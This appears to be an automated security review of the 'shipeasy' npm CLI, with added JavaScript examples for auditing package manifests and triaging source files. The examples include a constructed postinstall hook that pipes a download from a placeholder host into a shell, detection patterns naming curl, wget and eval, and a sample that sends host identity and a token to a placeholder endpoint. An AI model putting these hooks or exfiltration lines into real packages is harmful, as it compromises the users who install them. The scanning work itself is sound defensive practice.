AI Security Review
scanned 4h ago · by lpm-firewall-ai

No install-time attack behavior was found. The real risk is a user-invoked agent onboarding and automation surface: explicit CLI commands can register the Shipeasy MCP server and agent instruction files, and can prepare scheduled coding-agent runs.
Decision evidence
public snapshot
- dist/index.js registers the Shipeasy MCP server in Claude/Cursor/Copilot/Codex configs, only via the explicit `shipeasy mcp install`/`setup` commands.
- dist/index.js can write agent instruction files: AGENTS.md, .cursor/rules/shipeasy.mdc, .github/copilot-instructions.md.
- dist/index.js `ops trigger prep` builds a prompt for an unattended Claude routine that lists the allowed tools and embeds a restricted ops key; that key therefore lives in plaintext wherever the prompt is saved or scheduled.
- dist/index.js can spawn user-selected agents (`claude`, `codex`, `cursor-agent`, `copilot`) during interactive setup.
- package.json has no npm lifecycle hooks; bin only loads dist/index.js on CLI invocation.
- AI-agent config writes are tied to explicit CLI commands with prompts/dry-run options, not install-time execution.
- Network calls target Shipeasy/GitHub/npm endpoints aligned with login, API, MCP, skill fetch, and update-check behavior.
- Credential reads are limited to SHIPEASY_CLI_TOKEN/PROJECT_ID or Shipeasy config for authenticated API use.
- No evidence of broad file harvesting, secret exfiltration, destructive actions, persistence hooks, or remote code execution on import.
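How the "no npm lifecycle hooks; bin only runs on CLI invocation" evidence above can be reproduced on any npm tarball, as an added example (this is not the report's or the shipeasy package's code). It assumes only the parsed package.json and the list of packed files; both manifests below are constructed, `updates.example.invalid` is a placeholder host, and the hook and pattern lists are the example's own.

```javascript
// Added example (not code from the lpm-firewall-ai report or from the shipeasy
// package): a manifest audit that reproduces the "no npm lifecycle hooks; bin
// only runs on CLI invocation" evidence. Plain Node, no imports; the manifests
// and file lists below are constructed for illustration.

// Scripts npm runs during `npm install` of this package, i.e. code execution
// before any user-invoked CLI command. prepare/prepublish also run on a local
// install of a checkout and on git dependencies, so they count as well.
const INSTALL_TIME_HOOKS = ['preinstall', 'install', 'postinstall',
  'prepublish', 'preprepare', 'prepare', 'postprepare'];
// Lifecycle names npm still runs implicitly on other commands (pack, publish, version).
const OTHER_LIFECYCLE_HOOKS = ['prepublishOnly', 'prepack', 'postpack',
  'preuninstall', 'uninstall', 'postuninstall', 'preversion', 'version', 'postversion'];
// Hook bodies that usually mean "fetch something and run it".
const DOWNLOAD_OR_EVAL = [/\bcurl\b/, /\bwget\b/, /\bnode\s+-e\b/, /\beval\b/,
  /base64/, /\bsh\s+-c\b/, /powershell/i];

// pkg: parsed package.json; packedFiles: paths shipped in the tarball (npm pack --dry-run).
function auditManifest(pkg, packedFiles) {
  const scripts = pkg.scripts || {};
  const findings = [];

  for (const hook of INSTALL_TIME_HOOKS) {
    if (!(hook in scripts)) continue;
    const body = String(scripts[hook]);
    const fetches = DOWNLOAD_OR_EVAL.some((re) => re.test(body));
    findings.push({
      level: fetches ? 'high' : 'medium',
      where: `scripts.${hook}`,
      body,
      reason: fetches ? 'install-time hook downloads or evals code' : 'install-time hook',
    });
  }
  for (const hook of OTHER_LIFECYCLE_HOOKS) {
    if (hook in scripts) {
      findings.push({ level: 'info', where: `scripts.${hook}`, body: String(scripts[hook]),
        reason: 'non-install lifecycle hook' });
    }
  }
  // With no install/postinstall script but a binding.gyp present, npm runs
  // `node-gyp rebuild` anyway, which is install-time native code execution.
  if (!('install' in scripts) && !('postinstall' in scripts) && packedFiles.includes('binding.gyp')) {
    findings.push({ level: 'medium', where: 'binding.gyp', body: 'node-gyp rebuild (implicit)',
      reason: 'native build runs at install' });
  }

  // bin may be a string (command = unscoped package name) or a {command: path} map.
  const unscoped = String(pkg.name || '').replace(/^@[^/]+\//, '');
  const bin = typeof pkg.bin === 'string' ? { [unscoped]: pkg.bin } : (pkg.bin || {});
  const binTargets = Object.entries(bin).map(([cmd, rel]) => {
    const target = String(rel).replace(/^\.\//, '');
    const shipped = packedFiles.includes(target);
    const escapes = target.startsWith('/') || target.split('/').includes('..');
    if (!shipped || escapes) {
      findings.push({ level: 'high', where: `bin.${cmd}`, body: rel,
        reason: escapes ? 'bin target points outside the package' : 'bin target not in packed files' });
    }
    return { cmd, target, shipped };
  });

  // bin entries only run when the user invokes the command, so they never count
  // toward install-time execution; only hook and binding.gyp findings do.
  const installTimeExecution = findings.some((f) => f.level !== 'info' && !f.where.startsWith('bin.'));
  return { installTimeExecution, findings, binTargets };
}

// Constructed manifest mirroring the report's finding: no hooks, bin -> bin/<cli>.js.
const CLEAN_MANIFEST = {
  name: 'example-cli', version: '1.0.0',
  bin: { example: './bin/example.js' },
  scripts: { build: 'tsc -p .', test: 'vitest run' },
};
const CLEAN_FILES = ['package.json', 'bin/example.js', 'dist/index.js'];

// Constructed counter-example: a postinstall that pipes a download into a shell.
const HOOKED_MANIFEST = {
  ...CLEAN_MANIFEST,
  scripts: { ...CLEAN_MANIFEST.scripts,
    postinstall: 'curl -fsSL https://updates.example.invalid/setup.sh | sh' },
};

console.log(JSON.stringify(auditManifest(CLEAN_MANIFEST, CLEAN_FILES), null, 2));
console.log(JSON.stringify(auditManifest(HOOKED_MANIFEST, CLEAN_FILES), null, 2));
```

Feed it the real manifest with `JSON.parse(fs.readFileSync('package.json'))` and the file list from `npm pack --dry-run --json`; the clean manifest yields no findings and `installTimeExecution: false`, which is exactly the state the evidence list above records for the package.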
Source & flagged code
4 flagged
A single source file combines environment access, network access, and code or shell execution; review context before blocking.
- dist/index.js · L45 · Source collects local host identity data and sends it to an external endpoint.
- dist/index.js · L45 · Package source references dynamic require/import behavior.
- bin/shipeasy.js · L1
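The file-level heuristic above ("environment access + network access + code or shell execution; review context before blocking") and the two dist/index.js flags, as an added example of the triage logic. This is not the lpm-firewall-ai scanner's own implementation: the `SIGNALS` table, the rule names and the sample source are constructed for the example, and `telemetry.example.invalid` is a placeholder host.

```javascript
// Added example (not the lpm-firewall-ai scanner's own code): a line-level
// triage that tags each line of a JS file with the signals it carries, reports
// the first line per signal (so a finding can be cited the way the report cites
// dist/index.js L45), and raises the combined flags. Regex-based on purpose so
// it works on bundled dist/ output without an AST, at the price of false
// positives: the output is a triage list, not a verdict.

const SIGNALS = {
  env:         [/\bprocess\.env\b/],
  hostId:      [/\bos\.(hostname|userInfo|networkInterfaces|homedir)\s*\(/],
  network:     [/\bfetch\s*\(/,
                /\brequire\(\s*['"](node:)?(https?|net|dns|undici|axios|node-fetch)['"]\s*\)/,
                /\bfrom\s+['"](node:)?(https?|net|dns|undici|axios|node-fetch)['"]/],
  exec:        [/\brequire\(\s*['"](node:)?child_process['"]\s*\)/,
                /\b(exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\(/,
                /\beval\s*\(/, /\bnew\s+Function\s*\(/],
  // require()/import() with a non-literal first argument: the module loaded
  // is decided at runtime, which static review cannot resolve.
  dynamicLoad: [/\brequire\(\s*[^'"`\s)]/, /\bimport\s*\(/],
};

// Returns the first 1-based line per signal and the rules that fired.
function triageSource(code) {
  const firstLine = {};
  code.split('\n').forEach((line, i) => {
    for (const [name, patterns] of Object.entries(SIGNALS)) {
      if (firstLine[name] === undefined && patterns.some((re) => re.test(line))) {
        firstLine[name] = i + 1;
      }
    }
  });
  const has = (s) => firstLine[s] !== undefined;
  const flags = [];
  if (has('env') && has('network') && has('exec')) {
    flags.push({ rule: 'env+network+exec',
      line: Math.min(firstLine.env, firstLine.network, firstLine.exec),
      note: 'review context before blocking' });
  }
  if (has('hostId') && has('network')) {
    flags.push({ rule: 'host-identity-to-network', line: firstLine.hostId,
      note: 'host identity collected and a network sink present' });
  }
  if (has('dynamicLoad')) {
    flags.push({ rule: 'dynamic-require-import', line: firstLine.dynamicLoad,
      note: 'non-literal module load' });
  }
  return { firstLine, flags };
}

// Constructed sample source (not from any real package). Line numbers in the
// comments are what triageSource() reports.
const SAMPLE = [
  "const os = require('os');",                                             // 1
  "const { execSync } = require('child_process');",                        // 2 exec
  "const token = process.env.EXAMPLE_TOKEN;",                              // 3 env
  "async function report() {",                                             // 4
  "  const body = { host: os.hostname(), user: os.userInfo().username };", // 5 hostId
  "  await fetch('https://telemetry.example.invalid/v1', {",               // 6 network
  "    method: 'POST', headers: { authorization: token }, body: JSON.stringify(body) });", // 7
  "}",                                                                     // 8
  "const plugin = require(process.argv[2]);",                              // 9 dynamicLoad
  "execSync(plugin.command);",                                             // 10
].join('\n');

console.log(JSON.stringify(triageSource(SAMPLE), null, 2));
```

Run it over `dist/index.js` with `triageSource(fs.readFileSync(path, 'utf8'))`. A bundled CLI legitimately carries all three of env, network and exec (token from the environment, API calls, spawning the user's chosen agent), so the `env+network+exec` rule is a prompt to read the cited lines, not grounds to block; the `host-identity-to-network` rule is the one worth tracing end to end to see what is sent and where.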